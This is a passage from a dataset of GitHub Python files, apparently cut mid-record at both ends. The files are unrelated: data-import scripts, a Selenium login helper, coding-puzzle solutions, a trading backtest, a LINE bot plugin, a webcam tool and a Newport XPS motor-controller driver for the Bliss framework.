check if its ok first\n if re.search(\"(^[a-zA-Z0-9_.+-]+@[a-zA-Z0-9-]+\\.[a-zA-Z0-9-.]+$)\", pers['email']) is not None:\n personnel.recepient_email = pers['email'].strip()\n to_save = True\n\n if processed_number is not None:\n to_save = True\n if personnel.cell_no is None:\n personnel.cell_no = processed_number\n elif personnel.cell_no != processed_number:\n personnel.alternative_cell_no = processed_number\n\n if to_save:\n personnel.full_clean()\n personnel.save()\n except ValueError as e:\n terminal.tprint(str(e), 'fail')\n except Recipients.DoesNotExist:\n terminal.tprint(\"'%s' does not exist in the database, skipping them for now...\" % pers['username'].strip(), 'info')\n except Exception:\n raise\n\n def format_phone_number(self, phone_number):\n \"\"\"Given a phone number, format it to include the country code\n \"\"\"\n if phone_number == '':\n return None\n elif re.search('^7(\\d{8})$', phone_number) is not None:\n return '+2547%s' % re.split('^7(\\d{8})$', phone_number)[1:2][0]\n elif re.search('^0(\\d{9})$', phone_number) is not None:\n return '+254%s' % re.split('^0(\\d{9})$', phone_number)[1:2][0]\n elif re.search('^(\\d{9})$', phone_number) is not None:\n return '+2547%s' % re.split('^(\\d{9})$', phone_number)[1:2][0]\n elif re.search('^\\+254\\d{9}$', phone_number) is not None:\n return phone_number\n else:\n raise ValueError(\"Encountered a phone number '%s' of unknown format\" % phone_number)\n\n\n\nclass UpdateDatabase():\n def __init__(self):\n self.module_name = 'Updating database'\n\n def update_syndromic_submitter(self):\n # updates the details of the person who submitted the syndromic details\n submissions_2_update = SyndromicIncidences.objects.filter(scvo_reporter='not_set').all()\n\n updated = 0\n for subm in submissions_2_update:\n # get the raw submission for this record\n raw_subm = RawSubmissions.objects.filter(uuid=subm.uuid).values('raw_data', 'id').get() # we must have the raw submission with this uuid, else we are in shit\n\n print('Updating %s ..' 
% subm.uuid)\n            subm.scvo_reporter = raw_subm['raw_data']['s1q4_enum']\n            subm.publish()\n\n            updated += 1\n\n        print('Updated %d records' % updated)","repo_name":"badili/livhealth_scripts","sub_path":"odk_choices_parser.py","file_name":"odk_choices_parser.py","file_ext":"py","file_size_in_byte":12636,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"}
%s\" % e)\n # self.get_windows_img()\n\n def login(self,url,username,password):\n #self.driver = GetSeleniumDriver().driver\n self.driver.get(url)\n time.sleep(1)\n self.driver.maximize_window()\n time.sleep(1)\n #点击请登录\n IndexPage().click_login_link().click()\n time.sleep(1)\n #输入用户名\n LoginPage().click_username().send_keys(username)\n time.sleep(1)\n #输入密码\n LoginPage().click_password().send_keys(password)\n #点击登录按钮\n LoginPage().click_login_submit().click()\n time.sleep(1)\n #输入验证码\n #获取截图\n # dir_path=os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\n # image_path=os.path.join(dir_path,'picture\\screenshot.png')\n # self.driver.get_screenshot_as_file(image_path)\n #\n # #获取指定元素位置\n # element = self.driver.find_element_by_id('js_code_img')\n # left = int(element.location['x'])\n # top = int(element.location['y'])\n # right = int(element.location['x'] + element.size['width'])\n # bottom = int(element.location['y'] + element.size['height'])\n #\n # #通过Image处理图像\n # im = Image.open(image_path)\n # im = im.crop((left, top, right, bottom))\n # code_path=os.path.join(dir_path,'picture\\code.png')\n # im.save(code_path)\n # image=Image.open(code_path)\n # image = image.convert('L') #图像加强,二值化,PIL中有九种不同模式。分别为1,L,P,RGB,RGBA,CMYK,YCbCr,I,F。L为灰度图像\n # sharpness =ImageEnhance.Contrast(image)#对比度增强\n # image = sharpness.enhance(3.0) #3.0为图像的饱和度\n # image.show()\n # vcode=pytesseract.image_to_string(image)\n # time.sleep(1)\n # print vcode\n # time.sleep(1)\n # #输入验证码\n # LoginPage().input_code().send_keys(vcode.strip())\n #\n # time.sleep(3)\n # #点击登录按钮\n # LoginPage().click_login_submit().click()\n # time.sleep(3)\n\n def quit(self):\n self.driver.quit()","repo_name":"meixiaoqiu1/jinbi","sub_path":"common_method/common_def.py","file_name":"common_def.py","file_ext":"py","file_size_in_byte":4703,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"77"} +{"seq_id":"4520525563","text":"# Sample Input :\n# 5\n# Sample Output :\n# 11111\n# 0000\n# 111\n# 00\n# 1\n\ndef binary_pattern(n):\n for rows in range(1,n+1):\n flag = 1\n if rows %2 == 0:\n flag = 0\n for col in range(1,n-rows+2):\n print(flag,end=\"\")\n print()\n return\n\nn = int(input())\nbinary_pattern(n)\n","repo_name":"psmohammedali/Python_Series","sub_path":"for_loops/binary_pattern.py","file_name":"binary_pattern.py","file_ext":"py","file_size_in_byte":318,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"77"} +{"seq_id":"6581078969","text":"from backtesting import Backtest, Strategy\nfrom backtesting.lib import crossover\nimport pandas as pd\nfrom os import listdir, path\nfrom os.path import isfile, join\nfrom backtesting.test import SMA, GOOG\nfrom collections import deque\nfrom tensorflow import keras\nimport tensorflow as tf\nimport numpy as np\n\nDATAFOLDER = f'NoUploadData'\nRATIO_TO_PREDICT = \"IBM\"\nSEQ_LEN = 60 \nNAME = f\"DATA-LEN-10-SEQ-60\"\n\n# uncomment to force CPU\ntf.config.experimental.set_visible_devices([], \"DML\")\n\ndef loadDataFrame(name):\n df = pd.read_feather(name)\n #print(df)\n df.set_index(\"timestamp\", inplace=True)\n return df\n\nclass RNNStrategy(Strategy):\n\n def init(self):\n self.rolled_data = deque(maxlen=SEQ_LEN)\n model_name = f\"ModelTraining\\models\\{NAME}\"\n print(\"ModelTraining\\models\\{}\".format(NAME))\n self.model = keras.models.load_model(\"ModelTraining\\models\\{}\".format(NAME), compile=True)\n self.lastWasBuy = False\n\n def next(self):\n\n #print(self.data.df)\n\n 
#self.rolled_data.append([n for n in self.data.df.values[-1]]) # store all but the target\n sub_df = self.data.df[[f\"Close\", f\"High\", f\"Low\", f\"Volume\"]]\n #print(sub_df)\n for col in sub_df.columns:\n sub_df[col] = sub_df[col].pct_change() # pct change \"normalizes\" the different currencies (each crypto coin has vastly diff values, we're really more interested in the other coin's movements)\n pd.set_option('use_inf_as_na', True)\n sub_df.dropna(inplace=True)\n if (len(sub_df.values) == 0):\n return\n print(sub_df)\n input_data = np.array([n for n in sub_df.values[-1]])\n\n sequential_data = []\n prev_days = deque(maxlen=SEQ_LEN) # These will be our actual sequences. They are made with deque, which keeps the maximum length by popping out older values as new ones come in\n\n if (len(sub_df.values) < SEQ_LEN):\n return\n last_60 = sub_df.values[-SEQ_LEN:]\n for i in last_60: # iterate over the values\n prev_days.append([n for n in i]) # store all but the target\n sequential_data.append([prev_days]) # append those bad boys!\n\n\n sequential_data = np.asarray(sequential_data[0])\n #print(sequential_data.shape)\n #print(sequential_data)\n decision = self.model.predict(sequential_data)\n print(f\"decision: {decision}\")\n if decision[0][0] > 0.5 and self.lastWasBuy == False:\n self.buy()\n self.lastWasBuy = True\n elif decision[0][1] > 0.5 and self.lastWasBuy == True:\n self.sell()\n self.lastWasBuy = False\n\nloaded_df = loadDataFrame(f'{DATAFOLDER}/{RATIO_TO_PREDICT}.fed')\nloaded_df = loaded_df.rename(columns={\"open\":\"Open\", \"high\":\"High\", \"low\":\"Low\", \"close\":\"Close\", \"volume\":\"Volume\"})\nprint(len(loaded_df))\nloaded_df = loaded_df.sort_index()[200:800] # hard limite for the first 5000 minutes\nprint(loaded_df)\n\nbt = Backtest(loaded_df, RNNStrategy, commission=.002,\n exclusive_orders=True)\nstats = bt.run()\nbt.plot()\n\n","repo_name":"paulbaron/Le_Bot_Francais","sub_path":"QATesting/BacktestingWithNN.py","file_name":"BacktestingWithNN.py","file_ext":"py","file_size_in_byte":3077,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"6321806007","text":"#!/bin/python\n\n'''\n@joseanavarrete\n\nCat vs Dog Spotify puzzle\n\nhttps://labs.spotify.com/puzzles/\n'''\n\nimport unittest\n\n\nclass CatVsDogContest(object):\n def __init__(self, n_cats, n_dogs, votes):\n self.votes = self._init_votes(n_cats, n_dogs)\n for stay, leave in votes:\n self.votes[stay] += 1\n \n def max_num_satisfied_voters(self):\n ''' Gets the max upvotes number '''\n return str(max(self.votes.values()))\n\n def _init_votes(self, n_cats, n_dogs):\n cats = list(map(lambda x: 'C' + str(x), range(1, n_cats+1)))\n dogs = list(map(lambda x: 'D' + str(x), range(1, n_dogs+1)))\n initial_votes = [0] * (n_cats+n_dogs)\n return dict(zip(cats+dogs, initial_votes))\n\nclass TestCatVsDogContest(unittest.TestCase):\n def setUp(self):\n '''Init expected_output and contest list based on given data _data'''\n self.expected_output = \"\"\"1\n3\n3\"\"\"\n _data = \"\"\"3\n1 1 2\nC1 D1\nD1 C1\n1 2 4\nC1 D1\nC1 D1\nC1 D2\nD2 C1\n2 2 6\nC1 D1\nD1 C2\nD1 C1\nD2 C2\nC1 D2\nD1 C1\"\"\"\n\n data_lines = _data.splitlines()\n n_test_cases = int(data_lines[0])\n n_configs = 0\n config_case_position = 1\n self.contest_cases = []\n\n while n_configs < n_test_cases:\n n_cats, n_dogs, n_voters = tuple(\n map(int, data_lines[config_case_position].split(' ')))\n votes = [\n tuple(l.split(' '))\n for l in 
data_lines[config_case_position+1:config_case_position+n_voters+1]\n            ]\n            contest = CatVsDogContest(n_cats, n_dogs, votes)\n            self.contest_cases.append(contest)\n            n_configs += 1\n            config_case_position += n_voters+1\n\n    def test_max_num_satisfied_voters(self):\n        '''\n        Creates a list of satisfied voters per test case and\n        joins it in a multiline string\n        '''\n        max_num_satisfied_voters = []\n        for contest in self.contest_cases:\n            max_num_satisfied_voters.append(contest.max_num_satisfied_voters())\n\n        self.assertEqual('\\n'.join(max_num_satisfied_voters),\n                         self.expected_output)\n\ndef main():\n    unittest.main()\n\nif __name__ == '__main__':\n    main()\n","repo_name":"josenava/spotify_puzzle","sub_path":"cat_vs_dog.py","file_name":"cat_vs_dog.py","file_ext":"py","file_size_in_byte":2223,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"18666770146","text":"#!/usr/bin/python\n# -*- coding: UTF-8 -*-\n\"\"\"\nYou are given a string s consisting only of the characters '0' and '1'. In one operation, you can change any '0' to '1', or any '1' to '0'.\n\nAn alternating string is defined as a string in which no two adjacent characters are equal. For example, the string \"010\" is alternating, while the string \"0100\" is not.\n\nReturn the minimum number of operations needed to make s an alternating string.\n\"\"\"\n\n\nclass Solution:\n    def minOperations(self, s: str) -> int:\n        diff1 = diff2 = 0\n        for i, a in enumerate(s):\n            if a == \"1\":\n                diff1 += i % 2 == 0\n                diff2 += i % 2 == 1\n            else:\n                diff1 += i % 2 == 1\n                diff2 += i % 2 == 0\n        return min(diff1, diff2)\n\n\ns = \"0010010\"\nsol = Solution()\nres = sol.minOperations(s)\nprint(res)\n","repo_name":"LikeSco/learn-python","sub_path":"py-exam/1758.minOperations.py","file_name":"1758.minOperations.py","file_ext":"py","file_size_in_byte":884,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"5486937652","text":"# -*- coding: utf-8 -*-\n\nfrom mantra.util import parseMention\n\nfrom .util.pl import plugin\n\n\n@plugin(group='Fun')\nasync def gift(self, msg, args):\n    if msg.toType in {1, 2}:\n        mids = parseMention(msg)\n        if mids is not None:\n            for mid in mids:\n                await self.sendPresent(mid)\n            await self.sendText(msg.to, \"「 Gift 」\\nGift sent.\")\n            return\n    await self.sendPresent(msg.to)\n\n","repo_name":"Shivelight/Mantra-Client","sub_path":"plugins/fun2.py","file_name":"fun2.py","file_ext":"py","file_size_in_byte":434,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"15014212761","text":"#import sys\n#import time\nimport cv2\nimport matplotlib as mpl\nmpl.use('GTKAgg')\nfrom matplotlib import pyplot as plt\n#import numpy as np\n \nimport logging\nlogging.basicConfig(level = logging.INFO)\nlogger = logging.getLogger(__name__)\n \nclass RectBuilder:\n    def __init__(self, rect, x, y, width, height):\n        self.rect = rect\n        self.x, self.y, self.width, self.height = x, y, width, height\n \n        self.first_click = True \n        self.rect.figure.canvas.mpl_connect('button_press_event', self._click)\n \n#        self.label = ''\n#        self.rect.figure.canvas.mpl_connect('key_press_event', self._press)\n \n    def _click(self, event):\n        logger.debug('Event: %s', event)\n \n        if event.inaxes != self.rect.axes: return\n        logger.debug('Click at (%d, %d)', event.xdata, event.ydata)\n \n        if self.first_click:\n            self.x = event.xdata\n            self.rect.set_x(self.x)\n            self.y = event.ydata\n            self.rect.set_y(self.y)\n            self.first_click = False\n        else:\n            self.width = event.xdata - self.x\n            self.rect.set_width(self.width)\n            self.height = event.ydata - self.y\n            self.rect.set_height(self.height)\n            self.first_click = True\n \n        logger.info('(%d, 
%d), (%d, %d)',\n self.x, self.y,\n self.x + self.width, self.y + self.height)\n self.rect.figure.canvas.draw()\n \n# def _press(self, event):\n# logger.debug('Event: %s', event)\n# logger.debug('Press %c', event.key)\n# if event.key == \"~\":\n# self.label = self.label[:-1]\n# else:\n# self.label += event.key\n# self.rect.set_label(self.label)\n \ncap = cv2.VideoCapture(0)\n \n# Capture a frame\nret, frame = cap.read()\n#cap.release()\nb,g,r = cv2.split(frame)\nimage = cv2.merge([r,g,b])\n \n# Plot image\n\nmpl.rcParams['toolbar'] = 'None'\nfig = plt.figure()\nax_img = fig.add_subplot(111)\nax_img.imshow(image)\n \n# Plot bounding box and wait for events\nax_bb = fig.add_subplot(111)\nax_bb.set_title('Click to choose bounding box:')\nx, y, width, height = 10, 10, 50, 50\nrect = ax_bb.add_patch(mpl.patches.Rectangle((x, y),\n width,\n height,\n fill = False))\nrect_builder = RectBuilder(rect, x, y, width, height)\nplt.show()\nx1, y1 = int(rect.get_x()), int(rect.get_y())\nx2, y2 = int(x1 + rect.get_width()), int(y1 + rect.get_height())\n \n#cropped_image = image[y1:y2, x1:x2]\n#fig = plt.figure()\n#ax_img = fig.add_subplot(111)\n#ax_img.imshow(cropped_image)\n#plt.show()\n \n#cap = cv2.VideoCapture(0)\nwhile(True):\n # Read webcam frames and decode\n ret, frame = cap.read()\n# b,g,r = cv2.split(frame)\n# RGB = cv2.cvtColor(frame, cv2.COLOR_BGR2RGBA)\n image_gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n image_cropped = image_gray[y1:y2, x1:x2]\n #image_scaled = cv2.resize(image_cropped, )\n cv2.imshow('frame', image_cropped)\n \n # Scan QRcode from image_gray\n \n# # Save image and QRCode data\n# img_fname = str(int(time.time())) + \".png\"\n# cv2.imwrite(img_fname, image_cropped)\n# time.sleep(2)\n# k = cv2.waitKey(30) & 0xff\n k = cv2.waitKey()\n if k == ord('q'):\n break\n \ncap.release()\ncv2.destroyAllWindows()","repo_name":"gjmulder/meter-pop","sub_path":"webcam_meter_finder.py","file_name":"webcam_meter_finder.py","file_ext":"py","file_size_in_byte":3374,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"40874334149","text":"from __future__ import print_function\nfrom __future__ import absolute_import\n\nimport gevent\n\nfrom bliss.common import log as elog\nfrom bliss.common.axis import AxisState\nfrom bliss.common.hook import MotionHook\nfrom bliss.common.utils import object_method\nfrom bliss.controllers.motor import Controller\nfrom bliss.controllers.motors.newport.XPS import XPS\n\n\"\"\"\nBliss controller for XPS-Q motor controller.\n\ncontroller:\n class: NewportXPS\n name: xps-q\n description: Newport-Q test\n tcp: 160.103.146.95:5001\n nbAxes: 1\n axes:\n -\n name: omega\n group: M1\n address: 1 # first address should be 1\n velocity: 70.0\n acceleration: 320.0\n minJerkTime: 0.005\n maxJerkTime: 0.05\n steps_per_unit: 1\n backlash: 0.0\n low_limit: 0\n high_limit: 360\n offset: 0.0\n unit: deg\n autoHome: True\n user_tag: Omega\n gpio_conn: GPIO3 # GPIO connector for constant velocity pulse\n motion_hooks:\n - $newport_hook # execute post motion\n\"\"\"\n\n\nclass NewportHook(MotionHook):\n def __init__(self, name, config):\n self.config = config\n self.name = name\n super(NewportHook, self).__init__()\n\n def post_move(self, motion_list):\n \"\"\"\n Newport motors report motion complete when in actual\n fact (for DC motors at least) there is a settling time.\n \"\"\"\n gevent.sleep(1.0)\n\n\nclass NewportXPS(Controller):\n def __init__(self, *args, **kwargs):\n Controller.__init__(self, *args, **kwargs)\n 
elog.level(10)\n\n def initialize(self):\n elog.debug(\"initialize() called\")\n comm_cfg = ({'tcp': {'url': self.config.get('tcp')}})\n self.__nbAxes = self.config.get('nbAxes', int)\n self.__xps = XPS(comm_cfg)\n\n def finalize(self):\n elog.debug(\"finalize() called\")\n self.__sock.close()\n\n # Initialize each axis.\n def initialize_axis(self, axis):\n elog.debug(\"initialize_axis() called\")\n axis.channel = axis.config.get(\"address\")\n axis.group = axis.config.get(\"group\")\n axis.autoHome = axis.config.get(\"autoHome\")\n axis.minJerkTime = axis.config.get(\"minJerkTime\")\n axis.maxJerkTime = axis.config.get(\"maxJerkTime\")\n axis.gpioConn = axis.config.get(\"gpio_conn\")\n\n error, reply = self.__xps.GroupInitialize(axis.group)\n if error == 0:\n elog.debug(\"NewportXPS: initialisation successful\")\n elif error == -22:\n elog.debug(\"NewportXPS: Controller already initialised\")\n else:\n elog.error(\"NewportXPS: Controller initialise failed: \", error)\n\n if axis.autoHome:\n self.home_search(axis, False)\n self.read_velocity(axis)\n\n elog.debug(\"initialize_axis() complete\")\n\n def finalize_axis(self):\n elog.debug(\"finalize_axis() called\")\n\n def initialize_encoder(self, encoder):\n elog.debug(\"initialize_encoder() called\")\n\n def read_position(self, axis):\n elog.debug(\"read_position() called\")\n reply = self.__xps.GroupPositionCurrentGet(axis.group, self.__nbAxes)\n if reply[0] != 0:\n elog.error(\"NewportXPS Error: Failed to read position\", reply[1])\n else:\n return reply[int(axis.channel)]\n\n def read_velocity(self, axis):\n elog.debug(\"read_velocity() called\")\n results = self.__xps.PositionerSGammaParametersGet(axis.group + '.' + axis.name)\n print(results)\n if results[0] != 0:\n elog.error(\"NewportXPS Error: Unexpected response to read velocity\", results[1])\n else:\n print(results)\n return results[1]\n\n def set_velocity(self, axis, velocity):\n elog.debug(\"set_velocity() called\")\n error, reply = self.__xps.PositionerSGammaParametersSet(axis.group + '.' + axis.name,\n velocity,\n axis.acceleration(),\n axis.minJerkTime,\n axis.maxJerkTime)\n if error != 0:\n elog.error(\"NewportXPS Error: Unexpected response to setting velocity\", reply)\n\n def read_acceleration(self, axis):\n elog.debug(\"read_acceleration() called\")\n results = self.__xps.PositionerSGammaParametersGet(axis.group + '.' + axis.name)\n print(results)\n if results[0] != 0:\n elog.error(\"NewportXPS Error: Unexpected response to read acceleration\", results[1])\n else:\n return results[2]\n\n def set_acceleration(self, axis, acceleration):\n elog.debug(\"set_acceleration() called\")\n error, reply = self.__xps.PositionerSGammaParametersSet(axis.group + '.' 
+ axis.name,\n axis.velocity(),\n acceleration,\n axis.minJerkTime,\n axis.maxJerkTime)\n if error != 0:\n elog.error(\"NewportXPS Error: Unexpected response to setting acceleration\", reply)\n\n def start_one(self, motion):\n elog.debug(\"start_one() called\")\n self.cv_trigger(motion.axis)\n motor_name = motion.axis.group + \".\" + motion.axis.name\n error, reply = self.__xps.GroupMoveAbsolute(motor_name, [motion.target_pos, ])\n print(\"Reply:\", reply)\n if error != 0:\n elog.error(\"NewportXPS Error: Unexpected response to move absolute\", reply)\n\n def start_all(self, *motion_list):\n elog.debug(\"start_all() called\")\n target_positions = [0, 0]\n for motion in motion_list:\n target_positions[int(motion.axis.channel)-1] = motion.target_pos\n error, reply = self.__xps.GroupMoveAbsolute(motion.axis.group, target_positions)\n if error != 0:\n elog.error(\"NewportXPS Error: \", reply)\n\n def stop(self, motion):\n elog.debug(\"stop() called\")\n error, reply = self.__xps.GroupMoveAbort(motion.axis.group + '.' + motion.axis.name)\n if error == -22:\n elog.info(\"NewportXPS: All positioners idle\")\n elif error != 0 and error != -22:\n elog.error(\"NewportXPS Error: \", reply)\n\n def stop_all(self, *motion_list):\n elog.debug(\"stop_all() called\")\n error, reply = self.__xps.GroupMoveAbort(motion_list[0].axis.group)\n if error == -22:\n elog.info(\"NewportXPS: All positioners idle\")\n elif error != 0:\n elog.error(\"NewportXPS Error: \", reply)\n\n def home_search(self, axis, switch):\n elog.debug(\"home_search() called\")\n # Moves the motor to a repeatable starting location allows\n # homing only once after a power cycle.\n error, reply = self.__xps.GroupHomeSearch(axis.group)\n if error == 0:\n elog.info(\"NewportXPS: homing successful\")\n elif error == -22:\n elog.info(\"NewportXPS: Controller already homed\")\n else:\n elog.error(\"NewportXPS: Controller homing failed: \", error)\n\n def home_state(self, axis):\n elog.debug(\"home_state() called\")\n return self.state(axis)\n\n def get_info(self, axis):\n elog.debug(\"get_info() called\")\n return self.__xps.GetLibraryVersion()\n\n def state(self, axis):\n elog.debug(\"state() called\")\n error, status = self.__xps.GroupStatusGet(axis.group)\n if error != 0:\n elog.error(\"NewportXPS Error: Failed to read status\", status)\n return AxisState('FAULT')\n if status in [0, # NOTINIT state\n 1, # NOTINIT state due to an emergency brake: see positioner status\n 2, # NOTINIT state due to an emergency stop: see positioner status\n 3, # NOTINIT state due to a following error during homing\n 4, # NOTINIT state due to a following error\n 5, # NOTINIT state due to an homing timeout\n 6, # NOTINIT state due to a motion done timeout during homing\n 7, # NOTINIT state due to a KillAll command\n 8, # NOTINIT state due to an end of run after homing\n 9, # NOTINIT state due to an encoder calibration error\n 50, # NOTINIT state due to a mechanical zero inconsistency during homing\n 52, # NOTINIT state due to a clamping timeout\n 60, # NOTINIT state due to a group interlock error on not reference state\n 61, # NOTINIT state due to a group interlock error during homing\n 63, # NOTINIT state due to a motor initialization error\n 66, # NOTINIT state due to a perpendicularity error homing\n 67, # NOTINIT state due to a master/slave error during homing\n 71, # NOTINIT state from scaling calibration\n 72, # NOTINIT state due to a scaling calibration error\n 83, # NOTINIT state due to a group interlock error\n 106]: # Not initialized state due to an error 
with GroupKill or KillAll command\n return AxisState((\"NOTINIT\", \"Not Initialised\"))\n if status in [10, # Ready state due to an AbortMove command\n 11, # Ready state from homing\n 12, # Ready state from motion\n 13, # Ready State due to a MotionEnable command\n 14, # Ready state from slave\n 15, # Ready state from jogging\n 16, # Ready state from analog tracking\n 17, # Ready state from trajectory\n 18, # Ready state from spinning\n 19, # Ready state due to a group interlock error during motion\n 56, # Ready state from clamped\n 70, # Ready state from auto-tuning\n 77, # Ready state from excitation signal generation\n 79]: # Ready state from focus\n return AxisState(\"READY\")\n if status in [20, # Disable state\n 21, # Disabled state due to a following error on ready state\n 22, # Disabled state due to a following error during motion\n 23, # Disabled state due to a motion done timeout during moving\n 24, # Disabled state due to a following error on slave state\n 25, # Disabled state due to a following error on jogging state\n 26, # Disabled state due to a following error during trajectory\n 27, # Disabled state due to a motion done timeout during trajectory\n 28, # Disabled state due to a following error during analog tracking\n 29, # Disabled state due to a slave error during motion\n 30, # Disabled state due to a slave error on slave state\n 31, # Disabled state due to a slave error on jogging state\n 32, # Disabled state due to a slave error during trajectory\n 33, # Disabled state due to a slave error during analog tracking\n 34, # Disabled state due to a slave error on ready state\n 35, # Disabled state due to a following error on spinning state\n 36, # Disabled state due to a slave error on spinning state\n 37, # Disabled state due to a following error on auto-tuning\n 38, # Disabled state due to a slave error on auto-tuning\n 39, # Disable state due to an emergency stop on auto-tuning state\n 58, # Disabled state due to a following error during clamped\n 59, # Disabled state due to a motion done timeout during clamped\n 74, # Disable state due to a following error on excitation signal generation state\n 75, # Disable state due to a master/slave error on excitation signal generation state\n 76, # Disable state due to an emergency stop on excitation signal generation state\n 80, # Disable state due to a following error on focus state\n 81, # Disable state due to a master/slave error on focus state\n 82, # Disable state due to an emergency stop on focus state\n 84, # Disable state due to a group interlock error during moving\n 85, # Disable state due to a group interlock error during jogging\n 86, # Disable state due to a group interlock error on slave state\n 87, # Disable state due to a group interlock error during trajectory\n 88, # Disable state due to a group interlock error during analog tracking\n 89, # Disable state due to a group interlock error during spinning\n 90, # Disable state due to a group interlock error on ready state\n 91, # Disable state due to a group interlock error on auto-tuning state\n 92, # Disable state due to a group interlock error on excitation signal generation state\n 93, # Disable state due to a group interlock error on focus state\n 94, # Disabled state due to a motion done timeout during jogging\n 95, # Disabled state due to a motion done timeout during spinning\n 96, # Disabled state due to a motion done timeout during slave mode\n 97, # Disabled state due to a ZYGO error during motion\n 98, # Disabled state due to a master/slave error during 
trajectory\n 99, # Disable state due to a ZYGO error on jogging state\n 100, # Disabled state due to a ZYGO error during analog tracking\n 101, # Disable state due to a ZYGO error on auto-tuning state\n 102, # Disable state due to a ZYGO error on excitation signal generation state\n 103]: # Disabled state due to a ZYGO error on ready state\n return AxisState((\"DISABLED\", \"Disabled\"))\n if status in [43, # Homing state\n 44, # Moving state\n 45, # Trajectory state\n 46, # Slave state due to a SlaveEnable command\n 47, # Jogging state due to a JogEnable command\n 48, # Analog tracking state due to a TrackingEnable command\n 49, # Analog interpolated encoder calibrating state\n 51, # Spinning state due to a SpinParametersSet command\n 64]: # Referencing state\n return AxisState('BUSY')\n if status in [40, # Emergency braking\n 41, # Motor initialization state\n 42, # Not referenced state\n 55, # Clamped\n 65, # Clamping initialization\n 68, # Auto-tuning state\n 69, # Scaling calibration state\n 73, # Excitation signal generation state\n 78, # Focus state\n 104, # Driver initialization\n 105]: # Jitter initialization\n return AxisState(\"UNDECIDED\", \"Not categorised yet\")\n return AxisState(\"UNKNOWN\", \"This should not happen\")\n\n @object_method()\n def abort(self, axis):\n elog.debug(\"abort() called\")\n error, reply = self.__xps.GroupKill(axis.group)\n if error != 0:\n elog.error(\"NewportXPS Error: abort failed\", reply)\n\n @object_method()\n def cv_trigger(self, axis):\n \"\"\"\n Generate a pulses on the GPIO connector when the positioner reaches\n constant velocity motion.\n \"\"\"\n elog.debug(\"cv_trigger start\")\n motor_name = axis.group + \".\" + axis.name\n category = \".SGamma\"\n event1 = motor_name + category + \".ConstantVelocityStart\"\n action = axis.gpioConn + \".DO.DOPulse\"\n error, reply = self.__xps.EventExtendedConfigurationTriggerSet(\n [event1], [0], [0], [0], [0])\n if error != 0:\n elog.error(\"NewportXPS Error: \", reply)\n else:\n error, reply = self.__xps.EventExtendedConfigurationActionSet(\n [action], [4], [0], [0], [0])\n if error != 0:\n elog.error(\"NewportXPS Error: \", reply)\n else:\n error, reply = self.__xps.EventExtendedStart()\n if error != 0:\n elog.error(\"NewportXPS Error: \", reply)\n elog.debug(\"cv_trigger eventid \", reply)\n elog.debug(\"cv_trigger stop\")\n\n @object_method()\n def enable_position_compare(self, axis, start, stop, step):\n \"\"\"\n Generate output pulse on the PCO connector. The first pulse is output when\n the positioner crosses the start position and the last pulse is given at the\n stop position. 
The difference between the start and the stop position should\n be an integer multiple of the position step.\n\n example: Pos.setPositionCompare(5.0, 25.0, 0.002)\n will generate pulses between 5mm and 25mm every 0.002mm\n \"\"\"\n motor_name = axis.group + \".\" + axis.name\n elog.debug(motor_name, start, stop, step)\n error, reply = self.__xps.PositionerPositionCompareSet(motor_name, start, stop, step)\n if error != 0:\n elog.error(\"NewportXPS Error: \", reply)\n else:\n error, reply = self.__xps.PositionerPositionCompareEnable(motor_name)\n if error != 0:\n elog.error(\"NewportXPS Error: \", reply)\n\n @object_method()\n def disable_position_compare(self, axis):\n \"\"\"\n Disable output pulses on the PCO connector\n \"\"\"\n motor_name = axis.group + \".\" + axis.name\n error, reply = self.__xps.PositionerPositionCompareDisable(motor_name)\n if error != 0:\n elog.error(\"NewportXPS Error: \", reply)\n\n @object_method()\n def event_list(self, axis):\n error, reply = self.__xps.EventExtendedAllGet()\n if error == -83:\n elog.debug(\"NewportXPS: No events in list\")\n elif error != 0:\n elog.error(\"NewportXPS Error: \", reply)\n else:\n elog.debug(\"Event id list: \", reply)\n\n @object_method()\n def event_remove(self, axis, id):\n error, reply = self.__xps.EventExtendedRemove(id)\n","repo_name":"tiagocoutinho/bliss","sub_path":"bliss/controllers/motors/newport/NewportXPS.py","file_name":"NewportXPS.py","file_ext":"py","file_size_in_byte":19086,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"74118814009","text":"import sys\nimport heapq\ninput = sys.stdin.readline\nINF = int(1e9)\n\nn,e = map(int,input().split())\ngraph = [[] for i in range(n + 1)]\nfor i in range(e):\n a,b,c = map(int,input().split())\n graph[a].append((b,c))\n graph[b].append((a,c))\n\ndef dijkstra(start,finish,n):\n distance = [INF for i in range(n + 1)]\n q = []\n heapq.heappush(q,(0,start))\n distance[start] = 0\n while q:\n dist, now = heapq.heappop(q)\n if distance[now] < dist:\n continue\n for i in graph[now]:\n cost = dist + i[1]\n if cost < distance[i[0]]:\n distance[i[0]] = cost\n heapq.heappush(q,(cost,i[0]))\n return distance[finish]\n\nv1, v2 = map(int,input().split())\n\nv1v2 = dijkstra(v1,v2,n)\nv1_1 = dijkstra(v1,1,n)\nv1_n = dijkstra(v1,n,n)\nv2_1 = dijkstra(v2,1,n)\nv2_n = dijkstra(v2,n,n)\n\nresult = v1v2\n\nif v1_1 + v2_n > v2_1 + v1_n:\n result += v2_1 + v1_n\nelse:\n result += v1_1 + v2_n\n\nif result == INF:\n result = -1\n\nprint(result)","repo_name":"Yun-YeoJun/Codeforces","sub_path":"#805/bj1504.py","file_name":"bj1504.py","file_ext":"py","file_size_in_byte":1008,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"13649495065","text":"import pdb \nfrom models.artists import Artists\nimport repositories.artist_repository as artist_repository \nfrom models.albums import Albums\nimport repositories.album_repository as album_repository 